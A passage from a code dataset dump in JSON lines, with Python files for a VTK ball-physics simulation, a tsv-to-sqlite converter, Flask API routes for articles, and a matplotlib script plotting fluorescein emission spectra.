"line_number": 346, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 347, "usage_type": "name"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 371, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 403, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 404, "usage_type": "name"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 404, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 405, "usage_type": "name"}]} +{"seq_id": "575193062", "text": "import vtk\n\nradio=60\n\nclass vtkTimerCallback():\n def __init__(self, tiempo_simulado, actor, iren, posX,velX,posY,velY,reb,rugos):\n self.ubicaX = posX\n self.ubicaY = posY\n self.tiempo_simulado = tiempo_simulado\n self.actor = actor\n self.iren = iren\n self.timerId = None\n self.velocidadX=velX\n self.velocidadY=velY\n self.rebote=reb\n self.rugosidad=rugos\n\n def execute(self, obj, event):\n tiempo = 0\n while tiempo < self.tiempo_simulado:\n self.actor.SetPosition(self.ubicaX, radio,self.ubicaY)\n print(\"tiempo \"+str(tiempo)+\" \"+str(self.actor.GetPosition()))\n print(\" \"+str(self.velocidadX)+\" \"+str(self.velocidadY))\n tiempo += 0.001\n iren = obj\n self.actor.RotateZ(0.5)\n self.actor.RotateX(0.5*(self.velocidadX)/(self.velocidadX+self.velocidadY))\n self.actor.RotateY(0.5*(self.velocidadY)/(self.velocidadX+self.velocidadY))\n\n iren.GetRenderWindow().Render()\n\n if self.actor.GetPosition()[0]>1350 or self.actor.GetPosition()[0]<-1350:\n self.velocidadX= self.velocidadX*-1*self.rebote\n\n if self.actor.GetPosition()[2]>1350 or self.actor.GetPosition()[2]<-1350: \n 
self.velocidadY= self.velocidadY*-1*self.rebote  \r\n\r\n            if self.velocidadX>0: \r\n                self.ubicaX = self.ubicaX + self.velocidadX*tiempo - 4.9*self.rugosidad*tiempo*tiempo\r\n                if self.velocidadX > 9.8*self.rugosidad*tiempo:\r\n                    self.velocidadX= self.velocidadX - 9.8*self.rugosidad*tiempo\r\n                else:\r\n                    self.velocidadX=0\r\n            else:\r\n                self.ubicaX = self.ubicaX + self.velocidadX*tiempo + 4.9*self.rugosidad*tiempo*tiempo\r\n                if -1*self.velocidadX > 9.8*self.rugosidad*tiempo:\r\n                    self.velocidadX= self.velocidadX + 9.8*self.rugosidad*tiempo\r\n                else:\r\n                    self.velocidadX=0\r\n\r\n            if self.velocidadY>0: \r\n                self.ubicaY = self.ubicaY + self.velocidadY*tiempo - 4.9*self.rugosidad*tiempo*tiempo\r\n                if self.velocidadY > 9.8*self.rugosidad*tiempo:\r\n                    self.velocidadY= self.velocidadY - 9.8*self.rugosidad*tiempo\r\n                else:\r\n                    self.velocidadY=0\r\n            else:\r\n                self.ubicaY = self.ubicaY + self.velocidadY*tiempo + 4.9*self.rugosidad*tiempo*tiempo\r\n                self.velocidadY= self.velocidadY+ 9.8*self.rugosidad*tiempo\r\n                if -1*self.velocidadY > 9.8*self.rugosidad*tiempo:\r\n                    self.velocidadY= self.velocidadY + 9.8*self.rugosidad*tiempo\r\n                else:\r\n                    self.velocidadY=0\r\n\r\n            if abs(self.velocidadY)<0.005 and abs(self.velocidadX)<0.005:\r\n                break\r\n\r\n        if self.timerId:\r\n            iren.DestroyTimer(self.timerId)\r\n\r\n\r\ndef main():\r\n    colors = vtk.vtkNamedColors()\r\n\r\n    jpgfile = \"texture_bola.jpg\"\r\n\r\n    reader = vtk.vtkJPEGReader()\r\n    reader.SetFileName(jpgfile)\r\n\r\n    # Create a sphere\r\n    \r\n    sphereSource = vtk.vtkSphereSource()\r\n    sphereSource.SetCenter(0.0, 0.0, 0.0)\r\n    sphereSource.SetRadius(radio)\r\n    sphereSource.SetPhiResolution(300)\r\n    sphereSource.SetThetaResolution(300)\r\n\r\n    # Create a pared1\r\n    pared1 = vtk.vtkCubeSource()\r\n    pared1.SetXLength(3100)\r\n    pared1.SetYLength(250)\r\n    pared1.SetZLength(100)\r\n    pared1.Update()\r\n\r\n    # Create a pared2\r\n    pared2 = vtk.vtkCubeSource()\r\n    pared2.SetXLength(3100)\r\n    pared2.SetYLength(250)\r\n    pared2.SetZLength(100)\r\n    pared2.Update()\r\n\r\n    # Create a pared3\r\n    pared3 = vtk.vtkCubeSource()\r\n    pared3.SetXLength(100)\r\n    pared3.SetYLength(250)\r\n    pared3.SetZLength(3100)\r\n    pared3.Update()\r\n\r\n    # Create a pared4\r\n    pared4 = vtk.vtkCubeSource()\r\n    pared4.SetXLength(100)\r\n    pared4.SetYLength(250)\r\n    pared4.SetZLength(3100)\r\n    pared4.Update()\r\n\r\n    # Create a pared5\r\n    pared5 = vtk.vtkCubeSource()\r\n    pared5.SetXLength(3000)\r\n    pared5.SetYLength(radio/2)\r\n    pared5.SetZLength(3000)\r\n    pared5.Update()\r\n\r\n    texture = vtk.vtkTexture()\r\n    texture.SetInputConnection(reader.GetOutputPort())\r\n\r\n    map_to_sphere = vtk.vtkTextureMapToSphere()\r\n    map_to_sphere.SetInputConnection(sphereSource.GetOutputPort())\r\n\r\n    # Create a mapper and actor\r\n    mapper1 = vtk.vtkPolyDataMapper()\r\n    mapper1.SetInputConnection(map_to_sphere.GetOutputPort())\r\n\r\n    # Create mapper\r\n    mapper2 = vtk.vtkPolyDataMapper()\r\n    mapper2.SetInputData(pared1.GetOutput())\r\n\r\n    # Create mapper\r\n    mapper3 = vtk.vtkPolyDataMapper()\r\n    mapper3.SetInputData(pared2.GetOutput())\r\n\r\n    # Create mapper\r\n    mapper4 = vtk.vtkPolyDataMapper()\r\n    mapper4.SetInputData(pared3.GetOutput())\r\n\r\n    # Create mapper\r\n    mapper5 = vtk.vtkPolyDataMapper()\r\n    mapper5.SetInputData(pared4.GetOutput())\r\n\r\n    # Create mapper\r\n    mapper6 = vtk.vtkPolyDataMapper()\r\n    mapper6.SetInputData(pared5.GetOutput())\r\n\r\n    actor1 = vtk.vtkActor()\r\n    #actor1.GetProperty().SetColor(colors.GetColor3d(\"Peacock\"))\r\n    actor1.GetProperty().SetSpecular(0.6)\r\n    actor1.GetProperty().SetSpecularPower(30)\r\n    actor1.SetPosition(0,radio,0)\r\n    actor1.SetMapper(mapper1)\r\n    actor1.SetTexture(texture)\r\n\r\n    actor2 = vtk.vtkActor()\r\n    actor2.SetMapper(mapper2)\r\n    actor2.GetProperty().SetColor(173/255, 114/255, 4/255)\r\n    
actor2.SetPosition(0,0,-1500)\n\n actor3 = vtk.vtkActor()\n actor3.SetMapper(mapper3)\n actor3.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor3.SetPosition(0,0,1500)\n\n actor4 = vtk.vtkActor()\n actor4.SetMapper(mapper4)\n actor4.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor4.SetPosition(-1500,0,0)\n\n actor5 = vtk.vtkActor()\n actor5.SetMapper(mapper5)\n actor5.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor5.SetPosition(1500,0,0)\n\n actor6 = vtk.vtkActor()\n actor6.SetMapper(mapper6)\n actor6.GetProperty().SetColor(24/255, 173/255, 4/255)\n actor6.SetPosition(0,-radio/2,0)\n\n # Setup a renderer, render window, and interactor\n renderer = vtk.vtkRenderer()\n renderer.SetBackground(colors.GetColor3d(\"Black\"))\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.SetWindowName(\"Tarea 2\")\n renderWindow.SetSize(1600, 900)\n renderWindow.AddRenderer(renderer)\n\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n\n # Add the actor to the scene\n renderer.AddActor(actor1)\n renderer.AddActor(actor2)\n renderer.AddActor(actor3)\n renderer.AddActor(actor4)\n renderer.AddActor(actor5)\n renderer.AddActor(actor6)\n\n # Render and interact\n renderWindow.Render()\n renderer.GetActiveCamera().Zoom(1)\n renderWindow.Render()\n renderer.GetActiveCamera().SetPosition(2000,7000,7000)\n renderWindow.Render()\n\n # Initialize must be called prior to creating timer events.\n renderWindowInteractor.Initialize()\n\n # Sign up to receive TimerEvent\n #tiempo_simulado, actor, window, posicionX, velocidadX, posicionY, velocidadY, rebote ,rugosidad\n cb = vtkTimerCallback(3000, actor1, renderWindowInteractor,0,1,0,2,0.99,0.002)\n renderWindowInteractor.AddObserver('TimerEvent', cb.execute)\n cb.timerId = renderWindowInteractor.CreateRepeatingTimer(500)\n\n # start the interaction and timer\n renderWindow.Render()\n renderWindowInteractor.Start()\n\nmain()\n", "sub_path": "Practica2/ej1FISICA2.py", "file_name": "ej1FISICA2.py", "file_ext": "py", "file_size_in_byte": 7417, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "vtk.vtkNamedColors", "line_number": 73, "usage_type": "call"}, {"api_name": "vtk.vtkJPEGReader", "line_number": 77, "usage_type": "call"}, {"api_name": "vtk.vtkSphereSource", "line_number": 82, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 89, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 96, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 103, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 110, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 117, "usage_type": "call"}, {"api_name": "vtk.vtkTexture", "line_number": 123, "usage_type": "call"}, {"api_name": "vtk.vtkTextureMapToSphere", "line_number": 126, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 130, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 134, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 138, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 142, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 146, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 150, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 153, "usage_type": "call"}, {"api_name": "vtk.vtkActor", 
"line_number": 161, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 166, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 171, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 176, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 181, "usage_type": "call"}, {"api_name": "vtk.vtkRenderer", "line_number": 187, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindow", "line_number": 189, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindowInteractor", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "174021117", "text": "#!coding: utf-8\n__author__ = 'n-bar'\n\nimport os\nimport sys\nimport sqlite3\nimport argparse\nimport xlsxwriter\nimport logging\n\nfrom glob import glob\n\nlogger = logging.getLogger(__name__)\n\n# все новые поля и варианты их написания можно добавлять сюда\nfld_type = {'Month': [u'TEXT', u'Month'],\n 'ShortMonth': [u'TEXT', u'Month'],\n 'Client': [u'TEXT', u'Client'],\n 'Domain': [u'TEXT', u'Client'],\n 'CustomCategory': [u'TEXT', u'CustomCategory'],\n 'BannerCategory': [u'TEXT', u'CustomCategory'],\n 'Region': [u'TEXT', u'Region'],\n 'Direct_Shows': [u'INTEGER DEFAULT 0', u'Direct_Shows'],\n 'Direct_Clicks': [u'INTEGER DEFAULT 0', u'Direct_Clicks'],\n 'Direct_Cost': [u'REAL DEFAULT 0.0', u'Direct_Cost'],\n 'RSYA_Shows': [u'INTEGER DEFAULT 0', u'RSYA_Shows'],\n 'RSYA_Clicks': [u'INTEGER DEFAULT 0', u'RSYA_Clicks'],\n 'RSYA_Cost': [u'REAL DEFAULT 0.0', u'RSYA_Cost'],\n 'Shows': [u'INTEGER DEFAULT 0', u'Shows'],\n 'Clicks': [u'INTEGER DEFAULT 0', u'Clicks'],\n 'Cost': [u'REAL DEFAULT 0.0', u'Cost'],\n 'Qvartal': [u'TEXT', u'Qvartal'],\n 'Client_Type': [u'TEXT', u'Client_Type'],\n 'Region_Type': [u'TEXT', u'Region_Type'],\n 'CompCount': [u'INTEGER DEFAULT 0', u'CompCount'],\n 'Region:str': [u'TEXT', u'Region'],\n 'Month:str': [u'TEXT', u'Month'],\n 'Client:str': [u'TEXT', u'Client'],\n 'CustomCategory:str': [u'TEXT', u'CustomCategory'],\n 'Direct_Shows:int': [u'INTEGER DEFAULT 0', u'Direct_Shows'],\n 'Direct_Clicks:int': [u'INTEGER DEFAULT 0', u'Direct_Clicks'],\n 'Direct_Cost:float': [u'REAL DEFAULT 0.0', u'Direct_Cost'],\n 'RSYA_Shows:int': [u'INTEGER DEFAULT 0', u'RSYA_Shows'],\n 'RSYA_Clicks:int': [u'INTEGER DEFAULT 0', u'RSYA_Clicks'],\n 'RSYA_Cost:float': [u'REAL DEFAULT 0.0', u'RSYA_Cost'],\n 'Shows:int': [u'INTEGER DEFAULT 0', u'Shows'],\n 'Clicks:int': [u'INTEGER DEFAULT 0', u'Clicks'],\n 'Cost:float': [u'REAL DEFAULT 0.0', u'Cost']}\n\n# В строках должны отсуствовать символы \\# /\ndef make_db(src_file='data', db_name='source.db', sep='\\t', tbl_name='data'):\n\n if len(glob(src_file)) == 0:\n if len(glob('%s*' % src_file)) != 1:\n raise OSError(' len(glob(\\'%s*\\')) != 1.' 
% src_file)\n os.rename(glob('%s*' % src_file)[0], src_file)\n\n with open(src_file) as src:\n header = src.readline().strip('#\" \\n\\r').split(sep)\n rows = []\n for row in src:\n # Здесь, если в будущем понадобиться, можно передавать в map() расширенную функцию для обработки строк\n rows.append(map(lambda e: e.strip('#\" \\n\\r'), row.split(sep)))\n elem = \", \".join(map(lambda e: '\"{fld_name}\" {fld_type}'.format(fld_name=fld_type[e][1], fld_type=fld_type[e][0]),\n header))\n\n conn = sqlite3.connect(db_name)\n curs = conn.cursor()\n conn.text_factory = str\n\n try:\n curs.execute('DROP TABLE {table}'.format(table=tbl_name))\n except sqlite3.OperationalError:\n pass\n finally:\n createTbl = 'CREATE TABLE IF NOT EXISTS {table} ({fields_type})'.format(table=tbl_name, fields_type=elem)\n curs.execute(createTbl)\n\n # Вставка всех строк в базу\n loader = 'INSERT INTO {table} VALUES ({values})'.format(table=tbl_name, values=\",\".join('?' * len(header)))\n curs.executemany(loader, rows)\n conn.commit()\n conn.close()\n\n\ndef check_db(db_name=u'source.db', tbl_name=u'data'):\n\n conn = sqlite3.connect(db_name)\n curs = conn.cursor()\n\n # Получения уникальных элементов по эти полям для сводной мета-информации\n curs.execute(u'SELECT Client, sum(Cost) FROM {TABLE} GROUP BY Client ORDER BY sum(Cost) DESC'\n .format(TABLE=tbl_name))\n client_tmp = [[row[0], row[1]] for row in curs]\n client_fromdb = [e[0] for e in client_tmp]\n cost_fromdb = [int(e[1]) for e in client_tmp]\n\n curs.execute(u'SELECT DISTINCT Month FROM {TABLE} ORDER BY Month ASC'\n .format(TABLE=tbl_name))\n month_fromdb = [row[0] for row in curs]\n\n curs.execute(u'SELECT DISTINCT CustomCategory FROM {TABLE} ORDER BY CustomCategory ASC'\n .format(TABLE=tbl_name))\n cats_fromdb = [row[0] for row in curs]\n try:\n curs.execute(u'SELECT DISTINCT Region FROM {TABLE} ORDER BY Region ASC'\n .format(TABLE=tbl_name))\n region_fromdb = [row[0] for row in curs]\n except sqlite3.OperationalError:\n region_fromdb = []\n\n return tuple((tbl_name, month_fromdb, client_fromdb, cost_fromdb, region_fromdb, cats_fromdb))\n\n\ndef write_db_info(db_name='source.db', tbl_name='data'):\n\n db = check_db(db_name, tbl_name)\n wb_info = xlsxwriter.Workbook('info.xlsx')\n\n merge_format = wb_info.add_format({'font_name': 'Arial',\n 'font_size': '10',\n 'bold': True,\n 'align': 'center',\n 'valign': 'center',\n 'text_wrap': True,\n 'bg_color': '#a5a5a5',})\n ws_info = wb_info.add_worksheet('Info')\n ws_info.write_row(0, 0, ['Months', 'Competitors', 'Cost', 'Regions', 'Categories', '', 'Client', 'Tgt_Reg'], merge_format)\n ws_info.set_column(0, 5, 12)\n\n for i, n in enumerate(db[1:]):\n ws_info.write_column(1, i, n)\n wb_info.close()\n\nif __name__ == '__main__':\n\n def pars_argv():\n\n parser = argparse.ArgumentParser(description=u'Модуль для конвертации tsv-файла в sqlite базу.', epilog=u'@n-bar')\n\n parser.add_argument('-wd', '--workdir', default=os.path.realpath(os.path.dirname(sys.argv[0])), metavar='',\n help=u'Определяет путь до исходника, полезно, если модуль не лежит в одной с ним папке')\n parser.add_argument('-d', '--data', default='data', metavar='',\n help=u'Название tsv-файл для конвертации (default: %(default)s).')\n parser.add_argument('-b', '--base', default='source.db', metavar='',\n help=u'Имя создаваемой базы данных. (default: %(default)s).')\n parser.add_argument('-s', '--sep', default='\\t', metavar='',\n help=u'Тип сепаротора. 
(default: %(default)r).')\n\n return parser.parse_args(sys.argv[1:])\n\n opt = pars_argv()\n os.chdir(opt.workdir)\n\n # Настройка логгера\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler('.logerror.log')\n handler.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n logger.info('start tsv2db')\n try:\n make_db(src_file=opt.data, db_name=opt.base, sep=opt.sep)\n write_db_info(db_name=opt.base)\n except Exception as exc:\n logger.exception(repr(exc))\n else:\n logger.info('done tsv2db')", "sub_path": "ya_avtograf/tsv2db.py", "file_name": "tsv2db.py", "file_ext": "py", "file_size_in_byte": 7595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 53, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 54, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 56, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlite3.OperationalError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 88, "usage_type": "call"}, {"api_name": "sqlite3.OperationalError", "line_number": 109, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 118, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 141, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 156, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 159, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "248071829", "text": "# coding: utf-8\nfrom flask import render_template,jsonify,Response,g,request\nfrom flask_login import current_user\nimport json\nfrom ..models import Role,User,Interaction,Tag,PostTag\nfrom . import api\nfrom .. 
import db\n\n@api.route('/interaction//',methods=['GET'])\ndef get_interaction(id):\n interaction = Interaction.query.get_or_404(id)\n like_degree_one = interaction.light.filter_by(like_degree=0).count()\n like_degree_two = interaction.light.filter_by(like_degree=1).count()\n like_degree_three = interaction.light.filter_by(like_degree=2).count()\n user_role = -1 if current_user.is_anonymous else 0\n interaction.views+=1\n db.session.commit()\n return Response(json.dumps({\n \"kind\":4,\n \"title\":interaction.title,\n \"author\":User.query.get_or_404(interaction.author_id).name,\n \"time\":interaction.time.strftime('%Y-%m-%d'),\n \"body\":interaction.body,\n \"like\":[like_degree_one,like_degree_two,like_degree_three],\n \"editor\":interaction.editor\n }),mimetype='application/json')\n\n\n@api.route('/interactions/recommend/',methods=['GET','POST'])\ndef recommend_interactions():\n interact_id = int(request.get_json().get('article_id'))\n now_interact = Interaction.query.get_or_404(interact_id)\n try:\n tag_id = now_interact.tag[0].tag_id\n tag = Tag.query.get_or_404(tag_id)\n interactions = []\n for _interaction in tag.interactions:\n interactions.append(_interaction.interaction_id)\n sortlist = sorted(interactions, key=lambda id: Interaction.query.get_or_404(id).views,reverse=True)\n recommend_interactions = sortlist[:3] if len(sortlist)>=4 else sortlist\n except:\n recommend_interactions = []\n return Response(json.dumps([{\n \"title\":Interaction.query.filter_by(id=interaction_id).first().title,\n \"description\":Interaction.query.filter_by(id=interaction_id).first().description,\n \"author\":User.query.get_or_404(Interaction.query.filter_by(id=interaction_id).first().author_id).name,\n \"tag\":tag.body,\n \"views\":Interaction.query.filter_by(id=interaction_id).first().views\n }for interaction_id in recommend_interactions]\n ),mimetype='application/json')\n\n\n", "sub_path": "guisheng/guisheng_app/api_1_0/interactions.py", "file_name": "interactions.py", "file_ext": "py", "file_size_in_byte": 2263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Interaction.query.get_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_anonymous", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 18, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "models.User.query.get_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Interaction.query.get_or_404", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Tag.query.get_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Tag.query", "line_number": 35, "usage_type": "attribute"}, 
{"api_name": "models.Tag", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Interaction.query.get_or_404", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 43, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 44, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 44, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 45, "usage_type": "name"}, {"api_name": "models.User.query.get_or_404", "line_number": 46, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Interaction.query.filter_by", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Interaction.query", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Interaction", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "337251246", "text": "import numpy as np\nimport matplotlib as mpl\nmpl.use('pgf')\n\ndef figsize(scale):\n fig_width_pt = 345 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n #\"font.family\": \"serif\",\n #\"font.serif\": [], # blank entries should cause plots to inherit fonts from the document\n \"font.sans-serif\": [],\n #\"font.monospace\": [],\n \"axes.labelsize\": 20, # LaTeX default is 10pt font.\n \"font.size\": 20,\n \"legend.fontsize\": 16, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 20,\n \"ytick.labelsize\": 20,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated using this preamble\n ]\n }\n\nmpl.rcParams.update(pgf_with_latex)\n\nimport matplotlib.pyplot as plt\n\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n #ax = fig.add_subplot(111)\n ax1 = plt.axes()\n #ax2 = ax1.twinx()\n return fig, ax1\n\ndef savefig(filename):\n plt.tight_layout()\n plt.savefig('{}.pgf'.format(filename))\n plt.savefig('{}.pdf'.format(filename))\n\ndef plot_style(ax1):\n ax1.set_title('Fluorescein 
emission spectrum')\n ax1.set_xlabel('Wavelength \\ ($nm$)')\n ax1.set_ylabel('Emission \\ ($8$-$bit$)', color = 'k')\n ax1.tick_params('y', colors = 'k')\n ax1.spines['left'].set_color('k')\n #ax2.set_ylabel('$Temperature \\ (^{O}C$)', color = 'g')\n #ax2.tick_params('y', colors = 'g')\n #ax2.spines['right'].set_color('g')\n #ax1.minorticks_on()\n #ax1.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='0.75')\n #ax1.grid(which='minor', axis='x', linewidth=0.25, linestyle='-', color='0.75')\n #ax1.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='0.75')\n #ax1.grid(which='minor', axis='y', linewidth=0.25, linestyle='-', color='0.75')\n #ax1.set_ylim(10.008, 10.011)\n #ax1.set_ylim(18375, 18440)\n #ax1.set_xlim(0, 2500)\n ax1.ticklabel_format(style='plain')\n #ax2.ticklabel_format(style='plain')\n\n# Simple plot\n#fig, ax1, ax2 = newfig(1)\nfig, ax1 = newfig(1.8)\nplot_style(ax1)\n\nwavelength, amplitude = np.genfromtxt('Last.csv', delimiter = ',', unpack=True)\nwavelength2, amplitude2, other = np.genfromtxt('SecondLast.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength3, amplitude3, other = np.genfromtxt('SecondFromBottom.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength4, amplitude4, other = np.genfromtxt('0.01.csv', skip_header=6, delimiter = ',', unpack=True)\nwavelength5, amplitude5, other = np.genfromtxt('Top.csv', skip_header=6, delimiter = ',', unpack=True)\n\nax1.get_yaxis().get_major_formatter().set_useOffset(False)\n#ax2.get_yaxis().get_major_formatter().set_useOffset(False)\n\nax1.plot(wavelength4, amplitude4, 'b.', label = '0.01 $mol \\ L^{-1}$')\nax1.plot(wavelength5, amplitude5, 'g1', label = '0.001 $mol \\ L^{-1}$')\nax1.plot(wavelength3, amplitude3, 'r+', label = '0.0001 $mol \\ L^{-1}$')\nax1.plot(wavelength2, amplitude2, 'k2', label = '0.00001 $mol \\ L^{-1}$')\n\nlegend = ax1.legend(loc='best', markerscale=2)\nsavefig('/home/iain/Desktop/Github/SpectroscoPi/Poster/EmissionGraph')\n", "sub_path": "Data/Emission/LatexGraph.py", "file_name": "LatexGraph.py", "file_ext": "py", "file_size_in_byte": 3975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.rcParams.update", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 77, "usage_type": 
